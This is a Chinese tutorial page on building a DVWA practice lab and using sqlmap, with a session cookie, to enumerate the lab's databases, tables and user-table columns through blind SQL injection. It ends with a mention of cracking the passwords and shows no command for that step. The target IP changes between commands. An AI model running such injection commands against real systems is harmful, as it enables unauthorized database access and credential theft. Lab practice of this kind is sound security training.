sqlmap对dvwa靶场的账号密码进行破解 |
您所在的位置:网站首页 › sqlmap注入靶场 › sqlmap对dvwa靶场的账号密码进行破解 |
1.进行靶场搭建
准备两台虚拟机
靶机:win7
攻击机:kali linux
win7IP 172.26.0.130kali linuxIP 172.26.0.129
虚拟机搭建好后,相互ping能ping同就行
安装xampp
XAMPP Installers and Downloads for Apache FriendsXAMPP is an easy to install Apache distribution containing MariaDB, PHP and Perl. https://github.com/digininja/DVWA 下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里通过sqlmap得到当前服务器所有数据库 sqlmap -u "http://172.26.0.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' --dbs 通过sqlmap继续查看dvwa库的所有表(可得guestbook表与users表) sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa --tables 据此我们可猜测一下账号密码会在哪个表里(首先盲猜是在users表里,查看字段是找到账号密码的手段之一,一般账号字段为user,密码字段为password) sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa -T users --column 根据返回的字段我们可以肯定该靶场账号密码都在users表里 我们继续对账号密码进行爆破 本次教程完毕 希望三连 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |